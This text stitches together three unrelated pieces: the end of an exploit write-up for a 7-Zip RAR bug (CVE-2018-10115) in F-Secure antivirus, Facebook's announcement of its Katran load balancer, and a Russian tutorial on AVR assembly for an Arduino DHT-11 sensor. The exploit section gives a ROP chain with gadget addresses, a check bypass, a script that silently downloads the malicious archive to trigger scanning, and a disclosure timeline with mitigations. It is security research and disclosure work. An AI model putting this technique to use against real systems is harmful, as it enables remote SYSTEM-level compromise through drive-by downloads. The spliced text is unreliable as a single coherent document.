Note that we are copying from the end of the window buffer. It turns out that this works in general, because the source index (currentpos - 1) - distance is computed modulo the size of the window. However, the 7-Zip implementation actually checks whether we copy from a distance greater than the current position and aborts if this is the case. Fortunately, it is possible to bypass this check by corrupting a member variable of the Rar3 decoder with the read-write primitive. I leave it as an (easy) exercise for the interested reader to figure out which variable this is and why this works.

ROP

The technique outlined in the previous section allows us to write a ROP chain that consists of addresses within a single 64K region of code. Does this suffice? Let’s see. We try to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;

The crucial step of the chain is to call VirtualAlloc. All occurrences of jmp cs:VirtualAlloc I could find within F-Secure’s 7z.dll where at offsets of the form +0xd****. Unfortunately, I could not find an easy way to retrieve a pointer of this form within (or near) the Rar decoder objects. Instead, I could find a pointer of the form +0xc****, and used the following technique to turn it into a pointer of the form +0xd****:

  1. Use the read-write primitive to swap the largest available pointer of the form +0xc**** into the member variable LCount of the Rar1 decoder.
  2. Let the Rar1 decoder process a carefully crafted item, such that the member variable LCount is incremented (with a stepsize of one) until it has the form +0xd****.
  3. Use the read-write primitive to swap the member variable LCount into the end of the Rar3 decoder’s window buffer (see previous section).

As it turns out, the largest available pointer of the form +0xc**** is roughly +0xcd000, so we only need to increase it by 0x3000.

Being able to address a full 64K code region containing a jump to VirtualAlloc, I hoped that a ROP chain of the above form would be easy to achieve. Unfortunately, I simply could not do it, so I copied a second pointer to the window buffer. Two regions of 64K code, so 128K in total, were enough to obtain the desired ROP chain. It is still far from being nice, though. For example, this is how the stack pivot looks like:

0xd335c # push rax; cmp eax, 0x8b480002; or byte ptr [r8 - 0x77], cl; cmp bh, bh; adc byte ptr [r8 - 0x75], cl; pop rsp; and al, 0x48; mov rbp, qword ptr [rsp + 0x50]; mov rsi, qword ptr [rsp + 0x58]; add rsp, 0x30; pop rdi; ret;

Another example is how we set the register R9 to PAGE_EXECUTE_READWRITE (0x40) before calling VirtualAlloc:

# r9 := r9 >> 9
0xd6e75, # pop rcx; sbb al, 0x5f; ret;
0x9, # value popped into rcx
0xcdb4d, # shr r9d, cl; mov ecx, r10d; shl edi, cl; lea eax, dword ptr [rdi - 1]; mov rdi, qword ptr [rsp + 0x18]; and eax, r9d; or eax, esi; mov rsi, qword ptr [rsp + 0x10]; ret; 

This works, because R9 always has the value 0x8000 when we enter the ROP chain.

Wrapping up

We have seen a sketch of the basic exploitation idea. When actually implementing it, one has to overcome quite a few additional obstacles I have ignored to avoid boring you too much. Roughly speaking, the basic implementation steps are as follows:

  1. Use (roughly) the same heap massaging technique as in the 7-Zip exploit.
  2. Implement a basic Rar1 encoder to create a Rar1 item that controls the read-write primitive in the desired way.
  3. Implement a basic Rar3 encoder to create a Rar3 item that writes the ROP chain as well as the shellcode into the window buffer.

Finally, all items (even of different Rar versions) can be merged into a single archive, which leads to code execution when it is extracted.

Minimizing Required User Interaction

Virtually all antivirus products come with a so-called file system minifilter, which intercepts every file system access and triggers the engine to run background scans. F-Secure’s products do this as well. However, such automatic background scans do not extract compressed files. This means that it is not enough to send a victim a malicious RAR archive via e-mail. If one did this, it would be necessary for the victim to trigger a scan manually.

Obviously, this is still extremely bad, since the very purpose of antivirus software is to scan untrusted files. Yet, we can do better. It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files received over HTTP if they are at most 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. In order to do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request as follows:

<script>
  var xhr = new XMLHttpRequest(); 
  xhr.open('GET', '/exploit.rar', true); 
  xhr.responseType = 'blob';
  xhr.send(null);
</script>

Demo

The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 64-bit (Build 17134.81) with F-Secure Anti-Virus (also fully updated, but 7z.dll has been replaced with the unpatched version, which I have extracted from an F-Secure installation on April 15, 2018).

As you can see, the engine (fshoster64.exe) runs as NT AUTHORITY\SYSTEM, and the exploit causes it to start notepad.exe (also as NT AUTHORITY\SYSTEM).

Maybe you are asking yourself now why the shellcode starts notepad.exe instead of the good old calc.exe. Well, I tried to open calc.exe as NT AUTHORITY\SYSTEM, but it did not work. This has nothing to do with the exploit or the shellcode itself. It seems that it just does not work anymore with the new UWP calculator (it also fails to start when using psexec64.exe -i -s).

Conclusion

We have seen how an uninitialized memory usage bug can be exploited for arbitrary remote code execution as NT AUTHORITY\SYSTEM with minimal user interaction.

Apart from discussing the bugs and possible solutions with F-Secure, I have proposed three mitigation measures to harden their products:

  1. Sandbox the engine and make sure most of the code does not run under such high privileges.
  2. Stop snooping into HTTP traffic. This feature is useless anyway. It literally does not provide any security benefit whatsoever, since evading it requires the attacker only to switch from HTTP to HTTPS (F-Secure does not snoop into HTTPS traffic – thank God!). Hence, this feature only increases the attack surface of their products.
  3. Enable modern Windows exploitation mitigations such as CFG and ACG.

Finally, I want to remark that the presented exploitation technique is independent of any F-Secure features. It works on any product that uses the 7-Zip library to extract compressed RAR files, even if ASLR and DEP are enabled. For example, it is likely that Malwarebytes was affected3 as well.

 

Timeline of Disclosure

  • 2018-03-06 — Discovery of the bug in 7-Zip and F-Secure products (no reliably crashing PoC for F-Secure yet).
  • 2018-03-06 — Report to 7-Zip developer Igor Pavlov.
  • 2018-03-11 — Report to F-Secure (with reliably crashing PoC).
  • 2018-04-14 — MITRE assigned CVE-2018-10115 to the bug (for 7-Zip).
  • 2018-04-15 — Additional report to F-Secure that this was a highly critical vulnerability, and that I had a working code execution exploit for 7-Zip (only an ALSR bypass missing to attack F-Secure products). Proposed a detailed patch to F-Secure, and strongly recommended to roll out a fix without waiting for the upcoming 7-Zip update.
  • 2018-04-30 — 7-Zip 18.05 released, fixing CVE-2018-10115.
  • 2018-05-22 — F-Secure fix release via automatic update channel.
  • 2018-05-23 — Additional report to F-Secure with a full PoC for Remote Code Execution on various F-Secure products.
  • 2018-06-01 — Release of F-Secure advisory.
  • 2018-??-?? — Bug bounty paid.

Open-sourcing Katran, a scalable network load balancer (Facebook libs)

With billions of people around the globe using Facebook services, our infrastructure engineers have created a range of systems to optimize traffic and to enable fast, reliable access for everyone. Today, we are open-sourcing a component of this work by releasing the Katran forwarding plane software library, which powers the network load balancer used in Facebook’s infrastructure. Katran offers a software-based solution to load balancing with a completely reengineered forwarding plane that takes advantage of two recent innovations in kernel engineering: eXpress Data Path (XDP) and the eBPF virtual machine. Katran is deployed today on backend servers in Facebook’s points of presence (PoPs), and it has helped us improve the performance and scalability of network load balancing and reduce inefficiencies such as busy loops when there are no incoming packets. By sharing it with the open source community, we hope others can improve the performance of their load balancers and also use Katran as a foundation for future work.

The challenge of serving requests at Facebook scale

To manage traffic at Facebook scale, we have deployed a globally distributed network of points of presence to act as proxies for our data centers. Given the extremely high volume of requests, both PoPs and data centers confront the challenge of making the large fleet of (backend) servers appear as a single virtual unit to the outside world and also distributing the workload efficiently among those backend servers.

These challenges are typically addressed by announcing a virtual IP address (VIP) to the internet at each location. Packets destined to the VIP are then seamlessly distributed among the backend servers. The distribution algorithm, however, needs to account for the fact that the backend servers typically operate at an application layer and terminate the TCP connections. This responsibility is handled by a network load balancer (often called a layer 4 load balancer, or an L4LB, because it operates on packets rather than serving application level requests). Figure 1 illustrates the role of an L4LB in relation to the other network components.

Figure 1: A network load balancer fronts several backend servers running a backend application and consistently sends all packets from each client connection to a unique backend server.

Requirements for a high-performance load balancer

An L4LB’s performance is especially important for managing latency and scaling the number of backend servers, because the L4LBs are on a path that needs to process every incoming packet. Performance is typically measured as peak packets per second (pps) that the L4LB can process. Traditionally, engineers have preferred hardware-based solutions for this task because they typically use accelerators such as application-specific integrated circuits (ASICs) or field-programmable gate arrays (FPGAs) to reduce the burden on the main CPU. However, one of the drawbacks of a hardware-centric approach is that it limits the system’s flexibility. To effectively serve Facebook’s needs, a network load balancer must:

  • Run on commodity Linux servers. This allows us to run the load balancer on part or all of the large fleet of currently deployed servers. A software-based load balancer satisfies this criteria.
  • Coexist with other services on a given server. This removes the need for dedicated servers that run the load balancer exclusively, thereby increasing fault tolerance.
  • Allow low-disruption maintenance. Facebook’s software must be able to evolve quickly in order to support new or improved products and services. Maintenance and upgrades are a norm, not exceptions, for the load balancer and backend layers. Minimizing disruption during these events allows us to iterate faster.
  • Offer easy instrumentation and debugging. All large distributed infrastructures must contend with anomalies and unexpected events, so reducing the time to debug and troubleshoot issues is important. The load balancer needs to be instrumentable and friendly to standard tools like tcpdump.

In order to solve for these requirements, we designed a high-performance software network load balancer. The first generation of our L4LB was based on the IPVS kernel module and served Facebook’s needs for well over four years. However, it fell short on the goal of coexistence with other services, specifically the backends. In the second iteration, we leveraged the eXpress Data Path (XDP) framework and the new BPF virtual machine (eBPF) to run the software load balancer together with the backends on a large number of machines. Figure 2 shows the key difference between the two generations.

Figure 2: Differences between the two generations of L4LBs. Note that both are software load balancers running on backend servers. Katran (right) allows us to colocate the load balancer with backend application, thus increasing the load balancer capacity.

Our First-generation L4LB: Building on OSS Software

With our first-generation L4LB, we leaned heavily on existing open source components to implement most of the functionality. This approach helped us replace a hardware-based solution across a large deployment in only a few months. The design has four major components:

  • VIP announcement: This component simply announces the virtual IP addresses that the L4LB is responsible for to the world by peering with the network element (typically a switch) in front of the L4LB. The switch then uses an equal-cost multipath (ECMP) mechanism to distribute packets among the L4LBs announcing the VIP. We used ExaBGP for the VIP announcement because of its lightweight, flexible design.
  • Backend server selection: In order to send all packets from a client to the same backend, the L4LBs use a consistent hash that depends on the 5-tuple (source address, source port, destination address, destination port, and protocol) of the incoming packet. The use of a consistent hash ensures that all packets that belong to a transport connection are sent to the same backend irrespective of the L4LB receiving the packet. This removes the need for any state synchronization across multiple L4LBs. The consistent hash also guarantees minimal disruption to existing connections when a backend leaves or joins the pool of backends.
  • Forwarding plane: Once the L4LB picks the appropriate backend, the packets need to be forwarded to that host. To avoid restrictions such as keeping L4LB and backend hosts on the same L2 domain, we use a simple IP-in-IP encapsulation. This allows us to place L4LB and backend hosts in different racks. We used the IPVS kernel module for the encapsulation. The backends are configured to have the corresponding VIP on their loopback interface. This allows the backend to send packets on the return path directly to the client (instead of the L4LB). This optimization, often called direct server return (DSR), allows the L4LB to be constrained only by the incoming packet volume.
  • Control plane: This component performs various functions, including performing health checks on the backend servers, providing a simple interface (via a configuration file) to add or remove VIPs, and providing simple APIs to examine the state of the L4LB and backend servers. We developed this component in-house.

Each L4LB also stores the backend choice for each 5-tuple as a lookup table to avoid duplicate computation of the hash on future packets. This state is a pure optimization and is not necessary for correctness. This design met several requirements of Facebook’s workload listed above, but there was one major drawback: Colocating the L4LB and a backend on a single host increased the chance of device failure. Even with the local state, the L4LB was a CPU-intensive component. To separate the failure domains, we ran the L4LBs and backend servers on a disjointed set of machines. There were fewer L4LBs than backend servers in this setup, which made the L4LBs more vulnerable to a sudden increase in load. The fact that packets had to traverse the regular Linux network stack before being handled by the L4LB exacerbated the problem.

Figure 3: Overview of our first-generation L4LB. Note that the load balancer and the backend application run on different machines. Different load balancers make consistent decisions without any state synchronization. Using packet encapsulation allows the servers running the load balancer and the backend application to be placed in different racks. In a typical deployment, the ratio of the number of L4LBs to the number of backend application servers is very small.

Katran: Reimagining the forwarding plane

Katran, our second-generation L4LB, significantly improves upon the previous version with a completely reengineered forwarding plane. Two recent developments in the kernel world powered the new design:

  • The XDP provides a fast, programmable network data path without resorting to a full-fledged kernel bypass method and works in conjunction with the Linux networking stack. (A detailed overview of XDP is available here.)
  • The eBPF virtual machine provides a flexible, efficient, and more reliable way to interact with the Linux kernel and to extend its functionality by running user-space supplied programs at specific points in the kernel. eBPF has already brought dramatic improvements to several areas, including tracing and filtering. (More details are available here.)

The overall architecture of the system is similar to that of the first-generation L4LB: First, ExaBGP announces to the world which VIPS a particular Katran instance is responsible for. Second, packets destined to a VIP are sent to Katran instances using an ECMP mechanism. Finally, Katran selects a backend and forwards the packet to the correct backend server. The main differences are in the last step.

Early and efficient packet handling: Katran uses XDP in combination with a BPF program for packet forwarding. When XDP is enabled in driver mode, a packet handling routine (BPF program) is run immediately after a packet is received by the network interface card (NIC) and before the kernel intercepts it. XDP invokes the BPF program on every incoming packet. If the NIC has multiple queues, the program is invoked in parallel for each one them. The BPF program used for handling packets is lockless and uses a per-CPU version of BPF maps. Due to this parallelism, performance scales linearly with the number of the NIC’s RX queues. Katran also supports the “generic XDP” mode (instead of driver mode) of operation, at a performance cost.

Inexpensive and more stable hashing: Katran uses an extended version of the Maglev hash to select the backend server. A few features of the extended hash are resilience to backend server failures, more uniform distribution of load, and the ability to set unequal weights for different backend servers. The last of these is an important feature that allows us to handle hardware refreshes in our PoPs and data centers easily: We can absorb the newer generation hardware by simply setting appropriate weights. Despite its being more expressive, the code for computing this hash is small enough to fit entirely in the L1 cache.

More resilient local state: Katran’s efficiency at handling packets and computing the hash results in an interesting interaction with the local state table. We observed that, quite often, computing the hash is computationally easier than looking up the local state table for the 5-tuple to backend server choice. This is more visible for cases where the local state table lookup traverses all the way to the shared last level cache. In order to take advantage of this phenomenon in a natural way, we implemented the lookup table as an LRU-evicting cache. The LRU cache size is configurable at startup time and acts as a tunable parameter to strike a balance between computation and lookup. We picked these values empirically to optimize for pps. In addition, Katran provides a runtime “compute only” switch to ignore the LRU cache altogether in the event of catastrophic memory pressure on the host.

RSS-friendly encapsulation: Received Side Scaling (RSS) is an important optimization in NICs that aims to spread load across CPUs uniformly by steering packets from each flow to a separate CPU. Katran crafts its encapsulation to work in conjunction with RSS. Instead of using the same outer source for every IP-in-IP packet, packets in different flows (e.g., with different 5-tuples) are encapsulated using a different outer source IP, but packets in the same flow are always assigned the same outer source IP.

Figure 4: Katran enables a fast path for processing packets at high speed without resorting to a full-fledged kernel bypass. Note that the packets cross the kernel/user-space boundary only once. This allows us to colocate the L4LB and backend application without sacrificing performance.

These features dramatically enhance performance, flexibility and scalability of the L4LB. Katran’s design also gets rid of busy loops on receive path barely consuming any CPU if there are no incoming packets. In contrast to a full-fledged Kernel Bypass solution (such as DPDK), using XDP allows us to run Katran alongside any application without any performance penalties on the same host. Katran today runs alongside the backend servers in our PoPs with an improved L4LB-to-backend ratio. This increases resilience to load spikes, host failures, and maintenance, as well. The reengineered forwarding plane was central to this shift. We believe other systems can benefit by using our forwarding plane, so we are open-sourcing our code and including several examples of how to use it to craft an L4LB.

Additional Considerations

Katran operates under certain assumptions and constraints that enable the performance improvements. In practice, we found these constraints to be fairly reasonable, and they did not block our deployment. We believe that most users of our library will find them easy to satisfy. We’ve listed them below:

  • Katran works only in direct service return (DSR) mode.
  • Katran is the component that decides the final destination of a packet addressed to a VIP so the network needs to route packets to Katran first. This requires the network topology to be L3 based, e.g., packets are routed by IP rather than by MAC addresses.
  • Katran cannot forward fragmented packets, nor can it fragment them by itself. This could be mitigated either by increasing the maximal transmission unit (MTU) inside the network or by changing advertised TCP MSS from the backends. (The latter step is recommended even if you have increased the MTU.)
  • Katran doesn’t support packets with IP options set. The maximum packet size cannot exceed 3.5 KB.
  • Katran was built with the assumption that it’s going to be used in a «load balancer on a stick» scenario, where a single interface would be used for traffic both «from user to L4LB (ingress)» and «from L4LB to L7LB (egress).”

Despite these limitations, we believe that Katran offers an excellent forwarding plane to users and organizations who intend to leverage the exciting combination of XDP and eBPF to build efficient load balancers. We look forward to answering any questions from prospective adopters on our GitHub repository — and pull requests are always welcome!

Как программировать Arduino на ассемблере

Читаем данные с датчика температуры DHT-11 на «голом» железе Arduino Uno ATmega328p используя только ассемблер

Попробуем на простом примере рассмотреть, как можно “хакнуть” Arduino Uno и начать писать программы в машинных кодах, т.е. на ассемблере для микроконтроллера ATmega328p. На данном микроконтроллере собственно и собрана большая часть недорогих «классических» плат «duino». Данный код также будет работать на практически любой demo плате на ATmega328p и после небольших возможных доработок на любой плате Arduino на Atmel AVR микроконтроллере. В примере я постарался подойти так близко к железу, как это только возможно. Для лучшего понимания того, как работает микроконтроллер не будем использовать какие-либо готовые библиотеки, а уж тем более Arduino IDE. В качестве учебно-тренировочной задачи попробуем сделать самое простое что только возможно — правильно и полезно подергать одной ногой микроконтроллера, ну то есть будем читать данные из датчика температуры и влажности DHT-11.

Arduino очень клевая штука, но многое из того что происходит с микроконтроллером специально спрятано в дебрях библиотек и среды Arduino для того чтобы не пугать новичков. Поигравшись с мигающим светодиодом я захотел понять, как микроконтроллер собственно работает. Помимо утоления чисто познавательного зуда, знание того как работает микроконтроллер и стандартные средства общения микроконтроллера с внешним миром — это называется «периферия», дает преимущество при написании кода как для Arduino так и при написания кода на С/Assembler для микроконтроллеров а также помогает создавать более эффективные программы. Итак, будем делать все наиболее близко к железу, у нас есть: плата совместимая с Arduino Uno, датчик DHT-11, три провода, Atmel Studio и машинные коды.

Для начало подготовим нужное оборудование.

Писать код будем в Atmel Studio 7 — бесплатно скачивается с сайта производителя микроконтроллера — Atmel.

Atmel Studio 7

Весь код запускался на клоне Arduino Uno — у меня это DFRduino Uno от DFRobot, на контроллере ATmega328p работающем на частоте 16 MHz — отличная надежная плата. Каких-либо отличий от стандартного Uno в процессе эксплуатации я не заметил. Похожая чорная плата от DFBobot, только “Mega” отлетала у меня 2 года в качестве управляющего контроллера квадрокоптера — куда ее только не заносило — проблем не было.

DFRduino Uno

Для просмотра сигналов длительностью в микросекунды (а это на минутку 1 миллионная доля секунды), я использовал штуку, которая называется “логический анализатор”. Конкретно, я использовал клон восьмиканального USBEE AX Pro. Как смотреть для отладки такие быстрые процессы без осциллографа или логического анализатора — на самом деле даже не знаю, ничего посоветовать не могу.

Прежде всего я подключил свой клон Uno — как я говорил у меня это DFRduino Uno к Atmel Studio 7 и решил попробовать помигать светодиодиком на ассемблере. Как подключить описанно много где, один из примеров по ссылке в конце. Код пишется прямо в студии, прошивать плату можно через USB порт используя привычные возможности загрузчика Arduino -через AVRDude. Можно шить и через внешний программатор, я пробовал на китайском USBASP, по факту у меня оба способа работали. В обоих случаях надо только правильно настроить прошивальщик AVRDude, пример моих настроек на картинке

Полная строка аргументов:
-C “C:\avrdude\avrdude.conf” -p atmega328p -c arduino -P COM7 115200 -U flash:w:”$(ProjectDir)Debug\$(TargetName).hex:i

В итоге, для простоты я остановился на прошивке через USB порт — это стандартный способ для Arduio. На моей UNO стоит чип ATmega 328P, его и надо указать при создании проекта. Нужно также выбрать порт к которому подключаем Arduino — на моем компьютере это был COM7.

Для того, чтобы просто помигать светодиодом никаких дополнительных подключений не нужно, будем использовать светодиод, размещенный на плате и подключенный к порту Arduino D13 — напомню, что это 5-ая ножка порта «PORTB» контроллера.

Подключаем плату через USB кабель к компьютеру, пишем код в студии, прошиваем прямо из студии. Основная проблема здесь собственно увидеть это мигание, поскольку контроллер фигачит на частоте 16 MHz и, если включать и выключать светодиод такой же частотой мы увидим тускло горящий светодиод и собственно все.

Для того чтобы увидеть, когда он светится и когда он потушен, мы зажжем светодиод и займем процессор какой-либо бесполезной работой на примерно 1 секунду. Саму задержку можно рассчитать вручную зная частоту — одна команда выполняется за 1 такт или используя специальный калькулятор по ссылки внизу. После установки задержки, код выполняющий примерно то же что делает классический «Blink» Arduino может выглядеть примерно так:

      			cli
			sbi DDRB, 5	; PORT B, Pin 5 - на выход
			sbi PORTB, 5	; выставили на Pin 5 лог единицу

loop:						    ; delay 1000 ms
			ldi  r18, 82
			ldi  r19, 43
			ldi  r20, 0
L1:			dec  r20
			brne L1
			dec  r19
			brne L1
			dec  r18
			brne L1
			nop
			
			in R16, PORTB	; переключили XOR 5-ый бит в порту
			ldi R17, 0b00100000
			EOR R16, R17
			out PORTB, R16
			
			rjmp loop
еще раз — на моей плате светодиод Arduino (D13) сидит на 5 ноге порта PORTB ATmeg-и.

Но на самом деле так писать не очень хорошо, поскольку мы полностью похерили такие важные штуки как стек и вектор прерываний (о них — позже).

Ок, светодиодиком помигали, теперь для того чтобы практика работа с GPIO была более или менее осмысленной прочитаем значения с датчика DHT11 и сделаем это также целиком на ассемблере.

Для того чтобы прочитать данные из датчика нужно в правильной последовательность выставлять на рабочей линии датчика сигналы высокого и низкого уровня — собственно это и называется дергать ногой микроконтроллера. С одной стороны, ничего сложного, с другой стороны все какая-то осмысленная деятельность — меряем температуру и влажность — можно сказать сделали первый шаг к построению какой ни будь «Погодной станции» в будущем.

Забегая на один шаг вперед, хорошо бы понять, а что собственно с прочитанными данными будем делать? Ну хорошо прочитали мы значение датчика и установили значение переменной в памяти контроллера в 23 градуса по Цельсию, соответственно. Как посмотреть на эти цифры? Решение есть! Полученные данные я буду смотреть на большом компьютере выводя их через USART контроллера через виртуальный COM порт по USB кабелю прямо в терминальную программу типа PuTTY. Для того чтобы компьютер смог прочитать наши данные будем использовать преобразователь USB-TTL — такая штука которая и организует виртуальный COM порт в Windows.

Сама схема подключения может выглядеть примерно так:

Сигнальный вывод датчика подключен к ноге 2 (PIN2) порта PORTD контролера или (что то же самое) к выводу D2 Arduino. Он же через резистор 4.7 kOm “подтянут” на “плюс” питания. Плюс и минус датчика подключены — к соответствующим проводам питания. USB-TTL переходник подключен к выходу Tx USART порта Arduino, что значит PIN1 порта PORTD контроллера.

В собранном виде на breadboard:

Разбираемся с датчиком и смотрим datasheet. Сам по себе датчик несложный, и использует всего один сигнальный провод, который надо подтянуть через резистор к +5V — это будет базовый «высокий» уровень на линии. Если линия свободна — т.е. ни контроллер, ни датчик ничего не передают, на линии как раз и будет базовый «высокий» уровень. Когда датчик или контроллер что-то передают, то они занимают линию — устанавливают на линии «низкий» уровень на какое-то время. Всего датчик передает 5 байт. Байты датчик передает по очереди, сначала показатели влажности, потом температуры, завершает все контрольной суммой, это выглядит как “HHTTXX”, в общем смотрим datasheet. Пять байт — это 40 бит и каждый бит при передаче кодируется специальным образом.

Для упрощения, будет считать, что «высокий» уровень на линии — это «единица», а «низкий» соответственно «ноль». Согласно datasheet для начала работы с датчиком надо положить контроллером сигнальную линию на землю, т.е. получить «ноль» на линии и сделать это на период не менее чем 20 милсек (миллисекунд), а потом резко отпустить линию. В ответ — датчик должен выдать на сигнальную линию свою посылку, из сигналов высокого и низкого уровня разной длительности, которые кодируют нужные нам 40 бит. И, согласно datasheet, если мы удачно прочитаем эту посылку контроллером, то мы сразу поймем что: а) датчик собственно ответил, б) передал данные по влажности и температуре, с) передал контрольную сумму. В конце передачи датчик отпускает линию. Ну и в datasheet написано, что датчик можно опрашивать не чаще чем раз в секунду.

Итак, что должен сделать микроконтроллер, согласно datasheet, чтобы датчик ему ответил — нужно прижать линию на 20 миллисекунд, отпустить и быстро смотреть, что на линии:

Датчик должен ответить — положить линию в ноль на 80 микросекунд (мксек), потом отпустить на те же 80 мксек — это можно считать подтверждением того, что датчик на линии живой и откликается:

После этого, сразу же, по падению с высокого уровня на нижний датчик начинает передавать 40 отдельных бит. Каждый бит кодируются специальной посылкой, которая состоит из двух интервалов. Сначала датчик занимает линию (кладет ее в ноль) на определенное время — своего рода первый «полубит». Потом датчик отпускает линию (линия подтягивается к единице) тоже на определенное время — это типа второй «полубит». Длительность этих интервалов — «полубитов» в микросекундах кодирует что собственно пытается передать датчик: бит “ноль” или бит “единица”.

Рассмотрим описание битовой посылки: первый «полубит» всегда низкого уровня и фиксированной длительности — около 50 мксек. Длительность второго «полубита» определят, что датчик собственно передает.

Для передачи нуля используется сигнал высокого уровня длительностью 26–28 мксек:

Для передачи единицы, длительность сигнала высокого увеличивается до 70 микросекунд:

Мы не будет точно высчитывать длительность каждого интервала, нам вполне достаточно понимания, что если длительность второго «полубита» меньше чем первого — то закодирован ноль, если длительность второго «полубита» больше — то закодирована единица. Всего у нас 40 бит, каждый бит кодируется двумя импульсами, всего нам надо значит прочитать 80 интервалов. После того как прочитали 80 интервалов будем сравнить их попарно, первый “полубит” со вторым.

Вроде все просто, что же требуется от микроконтроллера для того чтобы прочитать данные с датчика? Получается нужно значит дернуть ногой в ноль, а потом просто считать всю длинную посылку с датчика на той же ноге. По ходу, будем разбирать посылку на «полу-биты», определяя где передается бит ноль, где единица. Потом соберем получившиеся биты, в байты, которые и будут ожидаемыми данными о влажности и температуре.

Ок, мы начали писать код и для начала попробуем проверить, а работает ли вообще датчик, для этого мы просто положим линию на 20 милсек и посмотрим на линии, что из этого получится логическим анализатором.

Определения:

==========		DEFINES =======================================
; определения для порта, к которому подключем DHT11			
				.EQU DHT_Port=PORTD
				.EQU DHT_InPort=PIND
				.EQU DHT_Pin=PORTD2
				.EQU DHT_Direction=DDRD
				.EQU DHT_Direction_Pin=DDD2

				.DEF Tmp1=R16
				.DEF USART_ByteR=R17		; переменная для отправки байта через USART
				.DEF Tmp2=R18
				.DEF USART_BytesN=R19		; переменная - сколько байт отправить в USART
				.DEF Tmp3=R20
				.DEF Cycle_Count=R21		; счетчик циклов в Expect_X
				.DEF ERR_CODE=R22			; возврат ошибок из подпрограмм
				.DEF N_Cycles=R23			; счетчик в READ_CYCLES
				.DEF ACCUM=R24
				.DEF Tmp4=R25

Как я уже писал сам датчик подключен на 2 ногу порта D. В Arduino Uno это цифровой выход D2 (смотрим для проверки Arduino Pinout).

Все делаем тупо: инициализировали порт на выход, выставили ноль, подождали 20 миллисекунд, освободили линию, переключили ногу в режим чтения и ждем появление сигналов на ноге.

;============	DHD11 INIT =======================================
; после инициализации сразу !!!! надо считать ответ контроллера и собственно данные
DHT_INIT:		CLI	; еще раз, на всякий случай - критичная ко времени секция

				; сохранили X для использования в READ_CYCLES - там нет времени инициализировать
				LDI XH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI XL, Low (CYCLES)	; загрузили младший байт адреса Cycles

				LDI Tmp1, (1<<DHT_Direction_Pin)
				OUT DHT_Direction, Tmp1			; порт D, Пин 2 на выход

				LDI Tmp1, (0<<DHT_Pin)
				OUT DHT_Port, Tmp1			; выставили 0 

				RCALL DELAY_20MS		; ждем 20 миллисекунд

				LDI Tmp1, (1<<DHT_Pin)		; освободили линию - выставили 1
				OUT DHT_Port, Tmp1	

				RCALL DELAY_10US		; ждем 10 микросекунд

				
				LDI Tmp1, (0<<DHT_Direction_Pin)		; порт D, Pin 2 на вход
				OUT DHT_Direction, Tmp1	
				LDI Tmp1,(1<<DHT_Pin)		; подтянули pull-up вход на вместе с внешним резистором на линии
				OUT DHT_Port, Tmp1		

; ждем ответа от сенсора - он должен положить линию в ноль на 80 us и отпустить на 80 us

Смотрим анализатором — а ответил ли датчик?

Да, ответ есть — вот те сигналы после нашего первого импульса в 20 милсек — это и есть ответ датчика. Для просмотра посылки я использовал китайский клон USBEE AX Pro который подключен к сигнальному проводу датчика.

Растянем масштаб так чтобы увидеть окончание нашего импульса в 20 милсек и лучше увидеть начало посылки от датчика — смотрим все как в datasheet — сначала датчик выставил низкий/высокий уровень по 80 мксек, потом начал передавать биты — а данном случае во втором «полубите» передается «0»

Значит датчик работает и данные нам прислал, теперь надо эти данные правильно прочитать. Поскольку задача у нас учебная, то и решать ее будем тупо в лоб. В момент ответа датчика, т.е. в момент перехода с высокого уровня в низкий, мы запустим цикл с счетчиком числа повторов нашего цикла. Внутри цикла, будем постоянно следить за уровнем сигнала на ноге. Итого, в цикле будем ждать, когда сигнал на ноге перейдет обратно на высокий уровень — тем самым определив длительность сигнала первого «полубита». Наш микроконтроллер работает на частоте 16 MHz и за период например в 50 микросекунд контроллер успеет выполнить около 800 инструкций. Когда на линии появится высокий уровень — то мы из цикла аккуратно выходим, а число повторов цикла, которые мы отсчитали с использованием счетчика — запоминаем в переменную.

После перехода сигнальной линии уже на высокий уровень мы делаем такую же операцию– считаем циклы, до момента когда датчик начнет передавать следующий бит и положит линию в низкий уровень. К счастью, нам не надо знать точный временной интервал наших импульсов, нам достаточно понимать, что один интервал больше другого. Понятно, что если датчик передает бит «ноль» то длительность второго «полубита» и соответственно число циклов, которые мы отсчитали будет меньше чем длительность первого «полубита». Если же датчик передал бит «единица», то число циклов которые мы насчитаем во время второго полубита будет больше чем в первым.

И для того что бы мы не висели вечно, если вдруг датчик не ответил или засбоил, сам цикл мы будем запускать на какой-то временной период, но который гарантированно больше самой длинной посылки, чтоб если датчик не ответил, то мы смогли выйти по тайм-ауту.

В данном случае показан пример для ситуации, когда у нас на линии был ноль, и мы считаем сколько раз мы в цикле мы считали состояние ноги контроллера, пока датчик не переключил линию в единицу.

;=============	EXPECT 1 =========================================
; крутимся в цикле ждем нужного состояния на пине
; когда появилось - выходим
; сообщаем сколько циклов ждали
; или сообщение об ошибке тайм оута если не дождались
EXPECT_1:		LDI Cycle_Count, 0			; загрузили счетчик циклов
			LDI ERR_CODE, 2			; Ошибка 2 - выход по тайм Out

			ldi  Tmp1, 2			; Загрузили 
			ldi  Tmp2, 169			; задержку 80 us

EXP1L1:			INC Cycle_Count			; увеличили счетчик циклов

			IN Tmp3, DHT_InPort		; читаем порт
			SBRC Tmp3, DHT_Pin	; Если 1 
			RJMP EXIT_EXPECT_1	; То выходим
			dec  Tmp2			; если нет то крутимся в задержке
			brne EXP1L1
			dec  Tmp1
			brne EXP1L1
			NOP					; Здесь выход по тайм out
			RET

EXIT_EXPECT_1:		LDI ERR_CODE, 1			; ошибка 1, все нормально, в Cycle_Count счетчик циклов
			RET

Аналогичная подпрограмма используется для того, чтобы посчитать сколько циклов у нас должно прокрутиться, пока датчик из состояния ноль на линии переложил линию в состояние единицы.

Для расчета временных задержек мы будет использовать тот же подход, который мы использовали при мигании светодиодом — подберем параметры пустого цикла для формирования нужной паузы. Я использовал специальный калькулятор. При желании можно посчитать число рабочих инструкций и вручную.

